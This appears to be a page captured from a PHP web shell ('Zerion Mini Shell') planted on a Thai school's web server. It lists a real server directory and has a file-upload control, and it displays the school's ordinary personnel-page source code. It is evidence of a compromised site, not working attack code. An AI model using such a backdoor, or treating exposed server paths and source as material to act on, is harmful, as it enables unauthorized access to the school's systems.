Mini Shell

Direktori : /var/www/vhosts/ccp.ac.th/smtp.ccp.ac.th/httpdocs/
Upload File :
Current File : /var/www/vhosts/ccp.ac.th/smtp.ccp.ac.th/httpdocs/personnel.php

<!DOCTYPE html>
<html lang="en">
<head> 
<title>บุคลากรโรงเรียนเทศบาลวัดชัยชุมพล | CCP</title>
<meta name="description" content="บุคลากร | โรงเรียนเทศบาลวัดชัยชุมพล | Watchaichumpol municipality school">
<?php include 'head.php'; ?>
</head> 
<?php include 'header.php'; ?>
<body>

	<!-- Breadcrumb section -->
	<div class="site-breadcrumb">
		<div class="container">
                    <a href="index.php"><i class="fa fa-home"></i> หน้าหลัก</a> <i class="fa fa-angle-right"></i>
			<span>บุคลากร</span>
		</div>
	</div>
	<!-- Breadcrumb section end -->

    <?php
        $content_id = 001;
        $sql_content = "SELECT * FROM content  WHERE content_id = $content_id ";
        $result_content = mysqli_query($link, $sql_content);
        $row_content = mysqli_fetch_array($result_content);
        echo $row_content['content'];       
      ?> 

<?php include 'footer.php'; ?>
	
</body>
</html>

Zerion Mini Shell 1.0